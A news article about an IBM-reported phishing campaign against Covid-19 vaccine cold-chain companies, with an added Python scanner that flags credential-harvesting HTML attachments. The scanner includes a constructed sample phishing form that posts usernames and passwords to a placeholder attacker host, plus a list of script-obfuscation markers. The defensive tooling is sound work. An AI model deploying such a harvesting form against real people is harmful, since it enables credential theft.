Since the Covid-19 pandemic began, hackers and crooks have paid it extraordinary attention, whether for espionage or fraud. Now, as pharmaceutical companies prepare to ship long-awaited vaccines, a new round of sophisticated phishing attacks is focusing on the complex supply chain that will bring those vaccines to the people who need them.
Two of the main Covid-19 vaccine candidates, from Pfizer and Moderna, have been submitted to the FDA for emergency clearance; the agency is due to review Pfizer’s application on December 10 and Moderna’s a week later. British regulators approved Pfizer’s vaccine on Wednesday. The next challenge for both vaccines is transporting them. They must be stored at freezing temperatures – minus 4 degrees Fahrenheit for Moderna and 94 degrees lower for Pfizer – which requires a network of specialists known as the “cold chain.” Today, IBM security researchers are publishing findings that a campaign has been targeting a significant number of these companies for months, across six different countries.
“This activity took place in September, which means that someone is looking to move forward, looking to be where they need to be at the critical moment,” says Claire Zaboeva, senior cyber threat analyst at IBM Security X-Force. “This is the first time that we have seen this level of pre-positioning in the context of the pandemic.”
The campaign appears to have focused on businesses and organizations associated with Gavi, the Vaccine Alliance’s Cold Chain Equipment Optimization Platform, an effort to rationalize and strengthen the cold chain. The only target IBM identified by name was the European Commission’s Directorate-General for Taxation and Customs Union, which, among other things, determines the tax breaks associated with transporting vaccines across borders. Seemingly any element of the cold chain was within the attackers’ reach. Other targets mentioned by IBM include manufacturers of solar panels, which could power trucks carrying the vaccine to more remote locations, and a German website developer whose clients include pharmaceutical, biotech and container shipping companies.
The attackers sent emails claiming to be from Haier Biomedical, a Chinese company that describes itself as “the world’s only full cold chain supplier”, under the guise of routine requests for quotation. The emails carried HTML attachments that asked the recipient to enter their credentials, which the hackers could then harvest to infiltrate the targeted company.
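The attachment pattern described above, an HTML file that presents a login form and ships the typed credentials to a server the attacker controls, leaves recognisable traces in the file itself. The following scanner is an added example for mail-gateway or SOC triage; it is not code from IBM’s report or from any vendor named in the article. It parses an HTML attachment with Python’s standard library, records password fields, where each form posts, and script features commonly used to hide a destination, then compares the form target against the domain the mail claims to come from. The two sample attachments and the domains in them (`supplier.example`, `collector.attacker.invalid`) are constructed for this illustration.

```python
"""Triage HTML email attachments for credential-harvesting indicators.

Added example, not from IBM's report. The sample HTML below is
constructed; the domains are placeholders, not real infrastructure.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Script features that legitimate quote requests rarely need but that
# harvesting pages often use to hide the real form destination.
SCRIPT_MARKERS = ("unescape(", "atob(", "eval(", "document.write(", "fromCharCode")


class _Collector(HTMLParser):
    """Collect input types, form actions and inline script text."""

    def __init__(self):
        super().__init__()
        self.input_types = []
        self.form_actions = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input":
            self.input_types.append((a.get("type") or "text").lower())
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def _same_org(host, sender_domain):
    """True if host is the sender's domain or one of its subdomains."""
    return host == sender_domain or host.endswith("." + sender_domain)


def scan_html_attachment(html, sender_domain):
    """Return the list of indicators found in one HTML attachment.

    sender_domain is the domain the mail claims to come from. A form that
    asks for a password and posts it anywhere else is the classic pattern.
    """
    p = _Collector()
    p.feed(html)
    indicators = []
    if "password" in p.input_types:
        indicators.append("password-field")
    for action in p.form_actions:
        parsed = urlparse(action)
        if parsed.hostname and not _same_org(parsed.hostname, sender_domain):
            indicators.append(f"form-posts-external:{parsed.hostname}")
        if parsed.scheme == "http":
            indicators.append("form-posts-cleartext")
    joined = " ".join(p.scripts)
    hits = [m for m in SCRIPT_MARKERS if m in joined]
    if hits:
        indicators.append("script-obfuscation:" + ",".join(hits))
    return indicators


def verdict(indicators):
    """'block' when a password field posts off-domain, 'review' on any other hit."""
    external = any(i.startswith("form-posts-external") for i in indicators)
    if "password-field" in indicators and external:
        return "block"
    return "review" if indicators else "clean"


# Constructed samples: an ordinary quotation form and a harvesting page.
SAMPLE_QUOTE_FORM = """<html><body><h1>Request for Quotation</h1>
<form method="post" action="https://portal.supplier.example/rfq">
<input type="text" name="company"><input type="submit" value="Send">
</form></body></html>"""

SAMPLE_HARVESTER = """<html><body><p>Please sign in to view the RFQ.</p>
<form method="post" action="https://collector.attacker.invalid/post.php">
<input type="email" name="u"><input type="password" name="p">
<input type="submit" value="Sign in"></form>
<script>document.write(unescape('%3Cimg%20src%3D%22logo.png%22%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for name, body in (("quote", SAMPLE_QUOTE_FORM), ("harvester", SAMPLE_HARVESTER)):
        found = scan_html_attachment(body, "supplier.example")
        print(f"{name}: {verdict(found)} {found}")
```

The sender-domain comparison is deliberately simple: it trusts the claimed sender only as a reference point for where a form should post, so a spoofed sender still gets flagged whenever the credentials go somewhere else. In a real gateway the `review` verdict would feed an analyst queue rather than a hard decision.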
IBM says it doesn’t know whether any of the attacks were successful or what the campaign’s ultimate goal might be. “The door is really open,” Zaboeva says. “Once you’ve got the keys to the kingdom, and you’re inside the city walls or on the network, there are a myriad of goals you can achieve, whether it’s critical information – such as schedules and distribution – or disruptive attacks.”
In a way, the attacks are just an evolution of what Covid-19 researchers have already been facing for months. In July, US, UK and Canadian officials called out Russian hackers for targeting vaccine development. China has also been implicated in an attempt against Moderna this summer. Just this week The Wall Street Journal reported that apparent North Korean hackers attempted to break into nine healthcare organizations, including pharmaceutical giants Johnson & Johnson and AstraZeneca.
The sustained cyberattacks on businesses and organizations working on Covid-19 research and vaccines are not surprising, given the stakes. While not unexpected, the shift in focus towards the cold chain is of particular concern, given the sensitive and urgent nature of vaccine deployment.
“As we move towards the distribution of a vaccine for Covid-19, the logistics of this operation will become extremely critical,” said John Hultquist, senior director of analysis at Mandiant Threat Intelligence. “Seemingly trivial security concerns could have major repercussions on such a complex and important effort.”